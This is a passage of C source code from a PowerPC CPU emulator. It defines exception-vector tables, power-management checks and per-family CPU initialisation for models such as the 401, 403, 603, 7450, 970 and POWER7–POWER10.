0x00000200; env->excp_vectors[POWERPC_EXCP_DSI] = 0x00000300; env->excp_vectors[POWERPC_EXCP_ISI] = 0x00000400; env->excp_vectors[POWERPC_EXCP_EXTERNAL] = 0x00000500; env->excp_vectors[POWERPC_EXCP_ALIGN] = 0x00000600; env->excp_vectors[POWERPC_EXCP_PROGRAM] = 0x00000700; env->excp_vectors[POWERPC_EXCP_FPU] = 0x00000900; env->excp_vectors[POWERPC_EXCP_DECR] = 0x00000900; env->excp_vectors[POWERPC_EXCP_SYSCALL] = 0x00000C00; env->excp_vectors[POWERPC_EXCP_TRACE] = 0x00000D00; env->excp_vectors[POWERPC_EXCP_FPA] = 0x00000E00; env->excp_vectors[POWERPC_EXCP_EMUL] = 0x00001000; env->excp_vectors[POWERPC_EXCP_ITLB] = 0x00001100; env->excp_vectors[POWERPC_EXCP_DTLB] = 0x00001200; env->excp_vectors[POWERPC_EXCP_ITLBE] = 0x00001300; env->excp_vectors[POWERPC_EXCP_DTLBE] = 0x00001400; env->excp_vectors[POWERPC_EXCP_DABR] = 0x00001C00; env->excp_vectors[POWERPC_EXCP_IABR] = 0x00001C00; env->excp_vectors[POWERPC_EXCP_MEXTBR] = 0x00001E00; env->excp_vectors[POWERPC_EXCP_NMEXTBR] = 0x00001F00; env->ivor_mask = 0x0000FFF0UL; env->ivpr_mask = 0xFFFF0000UL; /* Hardware reset vector */ env->hreset_vector = 0x00000100UL; } #endif static void init_excp_G2(CPUPPCState *env) { env->excp_vectors[POWERPC_EXCP_RESET] = 0x00000100; env->excp_vectors[POWERPC_EXCP_MCHECK] = 0x00000200; env->excp_vectors[POWERPC_EXCP_DSI] = 0x00000300; env->excp_vectors[POWERPC_EXCP_ISI] = 0x00000400; env->excp_vectors[POWERPC_EXCP_EXTERNAL] = 0x00000500; env->excp_vectors[POWERPC_EXCP_ALIGN] = 0x00000600; env->excp_vectors[POWERPC_EXCP_PROGRAM] = 0x00000700; env->excp_vectors[POWERPC_EXCP_FPU] = 0x00000800; env->excp_vectors[POWERPC_EXCP_DECR] = 0x00000900; env->excp_vectors[POWERPC_EXCP_CRITICAL] = 0x00000A00; env->excp_vectors[POWERPC_EXCP_SYSCALL] = 0x00000C00; env->excp_vectors[POWERPC_EXCP_TRACE] = 0x00000D00; env->excp_vectors[POWERPC_EXCP_IFTLB] = 0x00001000; env->excp_vectors[POWERPC_EXCP_DLTLB] = 0x00001100; env->excp_vectors[POWERPC_EXCP_DSTLB] = 0x00001200; env->excp_vectors[POWERPC_EXCP_IABR] = 0x00001300; env->excp_vectors[POWERPC_EXCP_SMI] = 0x00001400; /* Hardware reset vector */ env->hreset_vector = 0x00000100UL; } static void init_excp_e200(CPUPPCState *env, target_ulong ivpr_mask) { env->excp_vectors[POWERPC_EXCP_RESET] = 0x00000FFC; env->excp_vectors[POWERPC_EXCP_CRITICAL] = 0x00000000; env->excp_vectors[POWERPC_EXCP_MCHECK] = 0x00000000; env->excp_vectors[POWERPC_EXCP_DSI] = 0x00000000; env->excp_vectors[POWERPC_EXCP_ISI] = 0x00000000; env->excp_vectors[POWERPC_EXCP_EXTERNAL] = 0x00000000; env->excp_vectors[POWERPC_EXCP_ALIGN] = 0x00000000; env->excp_vectors[POWERPC_EXCP_PROGRAM] = 0x00000000; env->excp_vectors[POWERPC_EXCP_FPU] = 0x00000000; env->excp_vectors[POWERPC_EXCP_SYSCALL] = 0x00000000; env->excp_vectors[POWERPC_EXCP_APU] = 0x00000000; env->excp_vectors[POWERPC_EXCP_DECR] = 0x00000000; env->excp_vectors[POWERPC_EXCP_FIT] = 0x00000000; env->excp_vectors[POWERPC_EXCP_WDT] = 0x00000000; env->excp_vectors[POWERPC_EXCP_DTLB] = 0x00000000; env->excp_vectors[POWERPC_EXCP_ITLB] = 0x00000000; env->excp_vectors[POWERPC_EXCP_DEBUG] = 0x00000000; env->excp_vectors[POWERPC_EXCP_SPEU] = 0x00000000; env->excp_vectors[POWERPC_EXCP_EFPDI] = 0x00000000; env->excp_vectors[POWERPC_EXCP_EFPRI] = 0x00000000; env->ivor_mask = 0x0000FFF7UL; env->ivpr_mask = ivpr_mask; /* Hardware reset vector */ env->hreset_vector = 0xFFFFFFFCUL; } static void init_excp_BookE(CPUPPCState *env) { env->excp_vectors[POWERPC_EXCP_CRITICAL] = 0x00000000; env->excp_vectors[POWERPC_EXCP_MCHECK] = 0x00000000; env->excp_vectors[POWERPC_EXCP_DSI] = 
0x00000000; env->excp_vectors[POWERPC_EXCP_ISI] = 0x00000000; env->excp_vectors[POWERPC_EXCP_EXTERNAL] = 0x00000000; env->excp_vectors[POWERPC_EXCP_ALIGN] = 0x00000000; env->excp_vectors[POWERPC_EXCP_PROGRAM] = 0x00000000; env->excp_vectors[POWERPC_EXCP_FPU] = 0x00000000; env->excp_vectors[POWERPC_EXCP_SYSCALL] = 0x00000000; env->excp_vectors[POWERPC_EXCP_APU] = 0x00000000; env->excp_vectors[POWERPC_EXCP_DECR] = 0x00000000; env->excp_vectors[POWERPC_EXCP_FIT] = 0x00000000; env->excp_vectors[POWERPC_EXCP_WDT] = 0x00000000; env->excp_vectors[POWERPC_EXCP_DTLB] = 0x00000000; env->excp_vectors[POWERPC_EXCP_ITLB] = 0x00000000; env->excp_vectors[POWERPC_EXCP_DEBUG] = 0x00000000; env->ivor_mask = 0x0000FFF0UL; env->ivpr_mask = 0xFFFF0000UL; /* Hardware reset vector */ env->hreset_vector = 0xFFFFFFFCUL; } static void init_excp_601(CPUPPCState *env) { env->excp_vectors[POWERPC_EXCP_RESET] = 0x00000100; env->excp_vectors[POWERPC_EXCP_MCHECK] = 0x00000200; env->excp_vectors[POWERPC_EXCP_DSI] = 0x00000300; env->excp_vectors[POWERPC_EXCP_ISI] = 0x00000400; env->excp_vectors[POWERPC_EXCP_EXTERNAL] = 0x00000500; env->excp_vectors[POWERPC_EXCP_ALIGN] = 0x00000600; env->excp_vectors[POWERPC_EXCP_PROGRAM] = 0x00000700; env->excp_vectors[POWERPC_EXCP_FPU] = 0x00000800; env->excp_vectors[POWERPC_EXCP_DECR] = 0x00000900; env->excp_vectors[POWERPC_EXCP_IO] = 0x00000A00; env->excp_vectors[POWERPC_EXCP_SYSCALL] = 0x00000C00; env->excp_vectors[POWERPC_EXCP_RUNM] = 0x00002000; /* Hardware reset vector */ env->hreset_vector = 0x00000100UL; } static void init_excp_602(CPUPPCState *env) { /* XXX: exception prefix has a special behavior on 602 */ env->excp_vectors[POWERPC_EXCP_RESET] = 0x00000100; env->excp_vectors[POWERPC_EXCP_MCHECK] = 0x00000200; env->excp_vectors[POWERPC_EXCP_DSI] = 0x00000300; env->excp_vectors[POWERPC_EXCP_ISI] = 0x00000400; env->excp_vectors[POWERPC_EXCP_EXTERNAL] = 0x00000500; env->excp_vectors[POWERPC_EXCP_ALIGN] = 0x00000600; env->excp_vectors[POWERPC_EXCP_PROGRAM] = 0x00000700; env->excp_vectors[POWERPC_EXCP_FPU] = 0x00000800; env->excp_vectors[POWERPC_EXCP_DECR] = 0x00000900; env->excp_vectors[POWERPC_EXCP_SYSCALL] = 0x00000C00; env->excp_vectors[POWERPC_EXCP_TRACE] = 0x00000D00; env->excp_vectors[POWERPC_EXCP_IFTLB] = 0x00001000; env->excp_vectors[POWERPC_EXCP_DLTLB] = 0x00001100; env->excp_vectors[POWERPC_EXCP_DSTLB] = 0x00001200; env->excp_vectors[POWERPC_EXCP_IABR] = 0x00001300; env->excp_vectors[POWERPC_EXCP_SMI] = 0x00001400; env->excp_vectors[POWERPC_EXCP_WDT] = 0x00001500; env->excp_vectors[POWERPC_EXCP_EMUL] = 0x00001600; /* Hardware reset vector */ env->hreset_vector = 0x00000100UL; } static void init_excp_603(CPUPPCState *env) { env->excp_vectors[POWERPC_EXCP_RESET] = 0x00000100; env->excp_vectors[POWERPC_EXCP_MCHECK] = 0x00000200; env->excp_vectors[POWERPC_EXCP_DSI] = 0x00000300; env->excp_vectors[POWERPC_EXCP_ISI] = 0x00000400; env->excp_vectors[POWERPC_EXCP_EXTERNAL] = 0x00000500; env->excp_vectors[POWERPC_EXCP_ALIGN] = 0x00000600; env->excp_vectors[POWERPC_EXCP_PROGRAM] = 0x00000700; env->excp_vectors[POWERPC_EXCP_FPU] = 0x00000800; env->excp_vectors[POWERPC_EXCP_DECR] = 0x00000900; env->excp_vectors[POWERPC_EXCP_SYSCALL] = 0x00000C00; env->excp_vectors[POWERPC_EXCP_TRACE] = 0x00000D00; env->excp_vectors[POWERPC_EXCP_IFTLB] = 0x00001000; env->excp_vectors[POWERPC_EXCP_DLTLB] = 0x00001100; env->excp_vectors[POWERPC_EXCP_DSTLB] = 0x00001200; env->excp_vectors[POWERPC_EXCP_IABR] = 0x00001300; env->excp_vectors[POWERPC_EXCP_SMI] = 0x00001400; /* Hardware reset vector */ 
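/*
 * The value below is an offset, not an absolute address: the reset
 * path roughly resolves the entry point as
 *
 *     env->nip = env->hreset_vector | env->excp_prefix;
 *
 * (a sketch, assuming the usual reset code path), so a 603 resetting
 * with the high exception prefix (0xFFF00000) selected starts fetching
 * at 0xFFF00100, while the BookE/4xx models above use the fixed
 * 0xFFFFFFFCUL word at the top of the 32-bit address space instead.
 */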
env->hreset_vector = 0x00000100UL; } static void init_excp_604(CPUPPCState *env) { env->excp_vectors[POWERPC_EXCP_RESET] = 0x00000100; env->excp_vectors[POWERPC_EXCP_MCHECK] = 0x00000200; env->excp_vectors[POWERPC_EXCP_DSI] = 0x00000300; env->excp_vectors[POWERPC_EXCP_ISI] = 0x00000400; env->excp_vectors[POWERPC_EXCP_EXTERNAL] = 0x00000500; env->excp_vectors[POWERPC_EXCP_ALIGN] = 0x00000600; env->excp_vectors[POWERPC_EXCP_PROGRAM] = 0x00000700; env->excp_vectors[POWERPC_EXCP_FPU] = 0x00000800; env->excp_vectors[POWERPC_EXCP_DECR] = 0x00000900; env->excp_vectors[POWERPC_EXCP_SYSCALL] = 0x00000C00; env->excp_vectors[POWERPC_EXCP_TRACE] = 0x00000D00; env->excp_vectors[POWERPC_EXCP_PERFM] = 0x00000F00; env->excp_vectors[POWERPC_EXCP_IABR] = 0x00001300; env->excp_vectors[POWERPC_EXCP_SMI] = 0x00001400; /* Hardware reset vector */ env->hreset_vector = 0x00000100UL; } static void init_excp_7x0(CPUPPCState *env) { env->excp_vectors[POWERPC_EXCP_RESET] = 0x00000100; env->excp_vectors[POWERPC_EXCP_MCHECK] = 0x00000200; env->excp_vectors[POWERPC_EXCP_DSI] = 0x00000300; env->excp_vectors[POWERPC_EXCP_ISI] = 0x00000400; env->excp_vectors[POWERPC_EXCP_EXTERNAL] = 0x00000500; env->excp_vectors[POWERPC_EXCP_ALIGN] = 0x00000600; env->excp_vectors[POWERPC_EXCP_PROGRAM] = 0x00000700; env->excp_vectors[POWERPC_EXCP_FPU] = 0x00000800; env->excp_vectors[POWERPC_EXCP_DECR] = 0x00000900; env->excp_vectors[POWERPC_EXCP_SYSCALL] = 0x00000C00; env->excp_vectors[POWERPC_EXCP_TRACE] = 0x00000D00; env->excp_vectors[POWERPC_EXCP_PERFM] = 0x00000F00; env->excp_vectors[POWERPC_EXCP_IABR] = 0x00001300; env->excp_vectors[POWERPC_EXCP_SMI] = 0x00001400; env->excp_vectors[POWERPC_EXCP_THERM] = 0x00001700; /* Hardware reset vector */ env->hreset_vector = 0x00000100UL; } static void init_excp_750cl(CPUPPCState *env) { env->excp_vectors[POWERPC_EXCP_RESET] = 0x00000100; env->excp_vectors[POWERPC_EXCP_MCHECK] = 0x00000200; env->excp_vectors[POWERPC_EXCP_DSI] = 0x00000300; env->excp_vectors[POWERPC_EXCP_ISI] = 0x00000400; env->excp_vectors[POWERPC_EXCP_EXTERNAL] = 0x00000500; env->excp_vectors[POWERPC_EXCP_ALIGN] = 0x00000600; env->excp_vectors[POWERPC_EXCP_PROGRAM] = 0x00000700; env->excp_vectors[POWERPC_EXCP_FPU] = 0x00000800; env->excp_vectors[POWERPC_EXCP_DECR] = 0x00000900; env->excp_vectors[POWERPC_EXCP_SYSCALL] = 0x00000C00; env->excp_vectors[POWERPC_EXCP_TRACE] = 0x00000D00; env->excp_vectors[POWERPC_EXCP_PERFM] = 0x00000F00; env->excp_vectors[POWERPC_EXCP_IABR] = 0x00001300; env->excp_vectors[POWERPC_EXCP_SMI] = 0x00001400; /* Hardware reset vector */ env->hreset_vector = 0x00000100UL; } static void init_excp_750cx(CPUPPCState *env) { env->excp_vectors[POWERPC_EXCP_RESET] = 0x00000100; env->excp_vectors[POWERPC_EXCP_MCHECK] = 0x00000200; env->excp_vectors[POWERPC_EXCP_DSI] = 0x00000300; env->excp_vectors[POWERPC_EXCP_ISI] = 0x00000400; env->excp_vectors[POWERPC_EXCP_EXTERNAL] = 0x00000500; env->excp_vectors[POWERPC_EXCP_ALIGN] = 0x00000600; env->excp_vectors[POWERPC_EXCP_PROGRAM] = 0x00000700; env->excp_vectors[POWERPC_EXCP_FPU] = 0x00000800; env->excp_vectors[POWERPC_EXCP_DECR] = 0x00000900; env->excp_vectors[POWERPC_EXCP_SYSCALL] = 0x00000C00; env->excp_vectors[POWERPC_EXCP_TRACE] = 0x00000D00; env->excp_vectors[POWERPC_EXCP_PERFM] = 0x00000F00; env->excp_vectors[POWERPC_EXCP_IABR] = 0x00001300; env->excp_vectors[POWERPC_EXCP_THERM] = 0x00001700; /* Hardware reset vector */ env->hreset_vector = 0x00000100UL; } /* XXX: Check if this is correct */ static void init_excp_7x5(CPUPPCState *env) { 
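/*
 * This table matches init_excp_603 plus the PERFM and THERM vectors;
 * the 0x1000/0x1100/0x1200 entries (IFTLB/DLTLB/DSTLB) are the
 * instruction-fetch, data-load and data-store software TLB miss
 * handlers of the soft-MMU 6xx/7x5 parts, which is why they are
 * absent from the hard-MMU 7x0/750cx tables above.
 */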
env->excp_vectors[POWERPC_EXCP_RESET] = 0x00000100; env->excp_vectors[POWERPC_EXCP_MCHECK] = 0x00000200; env->excp_vectors[POWERPC_EXCP_DSI] = 0x00000300; env->excp_vectors[POWERPC_EXCP_ISI] = 0x00000400; env->excp_vectors[POWERPC_EXCP_EXTERNAL] = 0x00000500; env->excp_vectors[POWERPC_EXCP_ALIGN] = 0x00000600; env->excp_vectors[POWERPC_EXCP_PROGRAM] = 0x00000700; env->excp_vectors[POWERPC_EXCP_FPU] = 0x00000800; env->excp_vectors[POWERPC_EXCP_DECR] = 0x00000900; env->excp_vectors[POWERPC_EXCP_SYSCALL] = 0x00000C00; env->excp_vectors[POWERPC_EXCP_TRACE] = 0x00000D00; env->excp_vectors[POWERPC_EXCP_PERFM] = 0x00000F00; env->excp_vectors[POWERPC_EXCP_IFTLB] = 0x00001000; env->excp_vectors[POWERPC_EXCP_DLTLB] = 0x00001100; env->excp_vectors[POWERPC_EXCP_DSTLB] = 0x00001200; env->excp_vectors[POWERPC_EXCP_IABR] = 0x00001300; env->excp_vectors[POWERPC_EXCP_SMI] = 0x00001400; env->excp_vectors[POWERPC_EXCP_THERM] = 0x00001700; /* Hardware reset vector */ env->hreset_vector = 0x00000100UL; } static void init_excp_7400(CPUPPCState *env) { env->excp_vectors[POWERPC_EXCP_RESET] = 0x00000100; env->excp_vectors[POWERPC_EXCP_MCHECK] = 0x00000200; env->excp_vectors[POWERPC_EXCP_DSI] = 0x00000300; env->excp_vectors[POWERPC_EXCP_ISI] = 0x00000400; env->excp_vectors[POWERPC_EXCP_EXTERNAL] = 0x00000500; env->excp_vectors[POWERPC_EXCP_ALIGN] = 0x00000600; env->excp_vectors[POWERPC_EXCP_PROGRAM] = 0x00000700; env->excp_vectors[POWERPC_EXCP_FPU] = 0x00000800; env->excp_vectors[POWERPC_EXCP_DECR] = 0x00000900; env->excp_vectors[POWERPC_EXCP_SYSCALL] = 0x00000C00; env->excp_vectors[POWERPC_EXCP_TRACE] = 0x00000D00; env->excp_vectors[POWERPC_EXCP_PERFM] = 0x00000F00; env->excp_vectors[POWERPC_EXCP_VPU] = 0x00000F20; env->excp_vectors[POWERPC_EXCP_IABR] = 0x00001300; env->excp_vectors[POWERPC_EXCP_SMI] = 0x00001400; env->excp_vectors[POWERPC_EXCP_VPUA] = 0x00001600; env->excp_vectors[POWERPC_EXCP_THERM] = 0x00001700; /* Hardware reset vector */ env->hreset_vector = 0x00000100UL; } static void init_excp_7450(CPUPPCState *env) { env->excp_vectors[POWERPC_EXCP_RESET] = 0x00000100; env->excp_vectors[POWERPC_EXCP_MCHECK] = 0x00000200; env->excp_vectors[POWERPC_EXCP_DSI] = 0x00000300; env->excp_vectors[POWERPC_EXCP_ISI] = 0x00000400; env->excp_vectors[POWERPC_EXCP_EXTERNAL] = 0x00000500; env->excp_vectors[POWERPC_EXCP_ALIGN] = 0x00000600; env->excp_vectors[POWERPC_EXCP_PROGRAM] = 0x00000700; env->excp_vectors[POWERPC_EXCP_FPU] = 0x00000800; env->excp_vectors[POWERPC_EXCP_DECR] = 0x00000900; env->excp_vectors[POWERPC_EXCP_SYSCALL] = 0x00000C00; env->excp_vectors[POWERPC_EXCP_TRACE] = 0x00000D00; env->excp_vectors[POWERPC_EXCP_PERFM] = 0x00000F00; env->excp_vectors[POWERPC_EXCP_VPU] = 0x00000F20; env->excp_vectors[POWERPC_EXCP_IFTLB] = 0x00001000; env->excp_vectors[POWERPC_EXCP_DLTLB] = 0x00001100; env->excp_vectors[POWERPC_EXCP_DSTLB] = 0x00001200; env->excp_vectors[POWERPC_EXCP_IABR] = 0x00001300; env->excp_vectors[POWERPC_EXCP_SMI] = 0x00001400; env->excp_vectors[POWERPC_EXCP_VPUA] = 0x00001600; /* Hardware reset vector */ env->hreset_vector = 0x00000100UL; } #if defined(TARGET_PPC64) static void init_excp_970(CPUPPCState *env) { env->excp_vectors[POWERPC_EXCP_RESET] = 0x00000100; env->excp_vectors[POWERPC_EXCP_MCHECK] = 0x00000200; env->excp_vectors[POWERPC_EXCP_DSI] = 0x00000300; env->excp_vectors[POWERPC_EXCP_DSEG] = 0x00000380; env->excp_vectors[POWERPC_EXCP_ISI] = 0x00000400; env->excp_vectors[POWERPC_EXCP_ISEG] = 0x00000480; env->excp_vectors[POWERPC_EXCP_EXTERNAL] = 0x00000500; 
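/*
 * Relative to the classic 32-bit layouts above, the 970 adds the
 * 64-bit segment-interrupt vectors (DSEG at 0x380 and ISEG at 0x480,
 * set above) and the hypervisor decrementer (HDECR) at 0x980 below;
 * POWER7 and later extend this with the hypervisor
 * storage/instruction interrupts in the 0xE00..0xE60 range.  The
 * reset vector here is the architected 0x0000000000000100ULL rather
 * than the 0xFFFFFFFCUL used by the BookE/4xx models.
 */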
env->excp_vectors[POWERPC_EXCP_ALIGN] = 0x00000600; env->excp_vectors[POWERPC_EXCP_PROGRAM] = 0x00000700; env->excp_vectors[POWERPC_EXCP_FPU] = 0x00000800; env->excp_vectors[POWERPC_EXCP_DECR] = 0x00000900; env->excp_vectors[POWERPC_EXCP_HDECR] = 0x00000980; env->excp_vectors[POWERPC_EXCP_SYSCALL] = 0x00000C00; env->excp_vectors[POWERPC_EXCP_TRACE] = 0x00000D00; env->excp_vectors[POWERPC_EXCP_PERFM] = 0x00000F00; env->excp_vectors[POWERPC_EXCP_VPU] = 0x00000F20; env->excp_vectors[POWERPC_EXCP_IABR] = 0x00001300; env->excp_vectors[POWERPC_EXCP_MAINT] = 0x00001600; env->excp_vectors[POWERPC_EXCP_VPUA] = 0x00001700; env->excp_vectors[POWERPC_EXCP_THERM] = 0x00001800; /* Hardware reset vector */ env->hreset_vector = 0x0000000000000100ULL; } static void init_excp_POWER7(CPUPPCState *env) { env->excp_vectors[POWERPC_EXCP_RESET] = 0x00000100; env->excp_vectors[POWERPC_EXCP_MCHECK] = 0x00000200; env->excp_vectors[POWERPC_EXCP_DSI] = 0x00000300; env->excp_vectors[POWERPC_EXCP_DSEG] = 0x00000380; env->excp_vectors[POWERPC_EXCP_ISI] = 0x00000400; env->excp_vectors[POWERPC_EXCP_ISEG] = 0x00000480; env->excp_vectors[POWERPC_EXCP_EXTERNAL] = 0x00000500; env->excp_vectors[POWERPC_EXCP_ALIGN] = 0x00000600; env->excp_vectors[POWERPC_EXCP_PROGRAM] = 0x00000700; env->excp_vectors[POWERPC_EXCP_FPU] = 0x00000800; env->excp_vectors[POWERPC_EXCP_DECR] = 0x00000900; env->excp_vectors[POWERPC_EXCP_HDECR] = 0x00000980; env->excp_vectors[POWERPC_EXCP_SYSCALL] = 0x00000C00; env->excp_vectors[POWERPC_EXCP_TRACE] = 0x00000D00; env->excp_vectors[POWERPC_EXCP_HDSI] = 0x00000E00; env->excp_vectors[POWERPC_EXCP_HISI] = 0x00000E20; env->excp_vectors[POWERPC_EXCP_HV_EMU] = 0x00000E40; env->excp_vectors[POWERPC_EXCP_HV_MAINT] = 0x00000E60; env->excp_vectors[POWERPC_EXCP_PERFM] = 0x00000F00; env->excp_vectors[POWERPC_EXCP_VPU] = 0x00000F20; env->excp_vectors[POWERPC_EXCP_VSXU] = 0x00000F40; /* Hardware reset vector */ env->hreset_vector = 0x0000000000000100ULL; } static void init_excp_POWER8(CPUPPCState *env) { init_excp_POWER7(env); env->excp_vectors[POWERPC_EXCP_SDOOR] = 0x00000A00; env->excp_vectors[POWERPC_EXCP_FU] = 0x00000F60; env->excp_vectors[POWERPC_EXCP_HV_FU] = 0x00000F80; env->excp_vectors[POWERPC_EXCP_SDOOR_HV] = 0x00000E80; } static void init_excp_POWER9(CPUPPCState *env) { init_excp_POWER8(env); env->excp_vectors[POWERPC_EXCP_HVIRT] = 0x00000EA0; } static void init_excp_POWER10(CPUPPCState *env) { init_excp_POWER9(env); } #endif /*****************************************************************************/ /* Power management enable checks */ static int check_pow_none(CPUPPCState *env) { return 0; } static int check_pow_nocheck(CPUPPCState *env) { return 1; } static int check_pow_hid0(CPUPPCState *env) { if (env->spr[SPR_HID0] & 0x00E00000) { return 1; } return 0; } static int check_pow_hid0_74xx(CPUPPCState *env) { if (env->spr[SPR_HID0] & 0x00600000) { return 1; } return 0; } static bool ppc_cpu_interrupts_big_endian_always(PowerPCCPU *cpu) { return true; } #ifdef TARGET_PPC64 static bool ppc_cpu_interrupts_big_endian_lpcr(PowerPCCPU *cpu) { return !(cpu->env.spr[SPR_LPCR] & LPCR_ILE); } #endif /*****************************************************************************/ /* PowerPC implementations definitions */ #define POWERPC_FAMILY_NAME(_name) \ glue(glue(ppc_, _name), _cpu_family_class_init) #define POWERPC_FAMILY(_name) \ static void \ glue(glue(ppc_, _name), _cpu_family_class_init)(CPUClass *, void *); \ \ static void glue(glue(ppc_, _name), _cpu_family_class_init) static void 
init_proc_401(CPUPPCState *env) { gen_spr_40x(env); gen_spr_401_403(env); gen_spr_401(env); init_excp_4xx_real(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc40x_irq_init(env_archcpu(env)); SET_FIT_PERIOD(12, 16, 20, 24); SET_WDT_PERIOD(16, 20, 24, 28); } POWERPC_FAMILY(401)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 401"; pcc->init_proc = init_proc_401; pcc->check_pow = check_pow_nocheck; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_WRTEE | PPC_DCR | PPC_CACHE | PPC_CACHE_ICBI | PPC_40x_ICBT | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_4xx_COMMON | PPC_40x_EXCP; pcc->msr_mask = (1ull << MSR_KEY) | (1ull << MSR_POW) | (1ull << MSR_CE) | (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_ME) | (1ull << MSR_DE) | (1ull << MSR_LE); pcc->mmu_model = POWERPC_MMU_REAL; pcc->excp_model = POWERPC_EXCP_40x; pcc->bus_model = PPC_FLAGS_INPUT_401; pcc->flags = POWERPC_FLAG_CE | POWERPC_FLAG_DE | POWERPC_FLAG_BUS_CLK; } static void init_proc_401x2(CPUPPCState *env) { gen_spr_40x(env); gen_spr_401_403(env); gen_spr_401x2(env); gen_spr_compress(env); /* Memory management */ env->nb_tlb = 64; env->nb_ways = 1; env->id_tlbs = 0; env->tlb_type = TLB_EMB; init_excp_4xx_softmmu(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc40x_irq_init(env_archcpu(env)); SET_FIT_PERIOD(12, 16, 20, 24); SET_WDT_PERIOD(16, 20, 24, 28); } POWERPC_FAMILY(401x2)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 401x2"; pcc->init_proc = init_proc_401x2; pcc->check_pow = check_pow_nocheck; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MFTB | PPC_DCR | PPC_WRTEE | PPC_CACHE | PPC_CACHE_ICBI | PPC_40x_ICBT | PPC_CACHE_DCBZ | PPC_CACHE_DCBA | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_40x_TLB | PPC_MEM_TLBIA | PPC_MEM_TLBSYNC | PPC_4xx_COMMON | PPC_40x_EXCP; pcc->msr_mask = (1ull << 20) | (1ull << MSR_KEY) | (1ull << MSR_POW) | (1ull << MSR_CE) | (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_ME) | (1ull << MSR_DE) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_LE); pcc->mmu_model = POWERPC_MMU_SOFT_4xx_Z; pcc->excp_model = POWERPC_EXCP_40x; pcc->bus_model = PPC_FLAGS_INPUT_401; pcc->flags = POWERPC_FLAG_CE | POWERPC_FLAG_DE | POWERPC_FLAG_BUS_CLK; } #if 0 static void init_proc_401x3(CPUPPCState *env) { gen_spr_40x(env); gen_spr_401_403(env); gen_spr_401(env); gen_spr_401x2(env); gen_spr_compress(env); init_excp_4xx_softmmu(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc40x_irq_init(env_archcpu(env)); SET_FIT_PERIOD(12, 16, 20, 24); SET_WDT_PERIOD(16, 20, 24, 28); } POWERPC_FAMILY(401x3)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 401x3"; pcc->init_proc = init_proc_401x3; pcc->check_pow = check_pow_nocheck; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MFTB | PPC_DCR | PPC_WRTEE | PPC_CACHE | PPC_CACHE_ICBI | PPC_40x_ICBT | PPC_CACHE_DCBZ | PPC_CACHE_DCBA | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_40x_TLB | PPC_MEM_TLBIA | PPC_MEM_TLBSYNC | PPC_4xx_COMMON | PPC_40x_EXCP; pcc->msr_mask = (1ull << 20) | (1ull << MSR_KEY) | (1ull << MSR_POW) | (1ull << MSR_CE) | (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_ME) | (1ull << MSR_DWE) | (1ull << MSR_DE) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_LE); pcc->mmu_model = 
POWERPC_MMU_SOFT_4xx_Z; pcc->excp_model = POWERPC_EXCP_40x; pcc->bus_model = PPC_FLAGS_INPUT_401; pcc->flags = POWERPC_FLAG_CE | POWERPC_FLAG_DE | POWERPC_FLAG_BUS_CLK; } #endif
static void init_proc_IOP480(CPUPPCState *env) { gen_spr_40x(env); gen_spr_401_403(env); gen_spr_401x2(env); gen_spr_compress(env); /* Memory management */ env->nb_tlb = 64; env->nb_ways = 1; env->id_tlbs = 0; env->tlb_type = TLB_EMB; init_excp_4xx_softmmu(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc40x_irq_init(env_archcpu(env)); SET_FIT_PERIOD(8, 12, 16, 20); SET_WDT_PERIOD(16, 20, 24, 28); }
POWERPC_FAMILY(IOP480)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "IOP480"; pcc->init_proc = init_proc_IOP480; pcc->check_pow = check_pow_nocheck; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_DCR | PPC_WRTEE | PPC_CACHE | PPC_CACHE_ICBI | PPC_40x_ICBT | PPC_CACHE_DCBZ | PPC_CACHE_DCBA | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_40x_TLB | PPC_MEM_TLBIA | PPC_MEM_TLBSYNC | PPC_4xx_COMMON | PPC_40x_EXCP; pcc->msr_mask = (1ull << 20) | (1ull << MSR_KEY) | (1ull << MSR_POW) | (1ull << MSR_CE) | (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_ME) | (1ull << MSR_DE) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_LE); pcc->mmu_model = POWERPC_MMU_SOFT_4xx_Z; pcc->excp_model = POWERPC_EXCP_40x; pcc->bus_model = PPC_FLAGS_INPUT_401; pcc->flags = POWERPC_FLAG_CE | POWERPC_FLAG_DE | POWERPC_FLAG_BUS_CLK; }
static void init_proc_403(CPUPPCState *env) { gen_spr_40x(env); gen_spr_401_403(env); gen_spr_403(env); gen_spr_403_real(env); init_excp_4xx_real(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc40x_irq_init(env_archcpu(env)); SET_FIT_PERIOD(8, 12, 16, 20); SET_WDT_PERIOD(16, 20, 24, 28); }
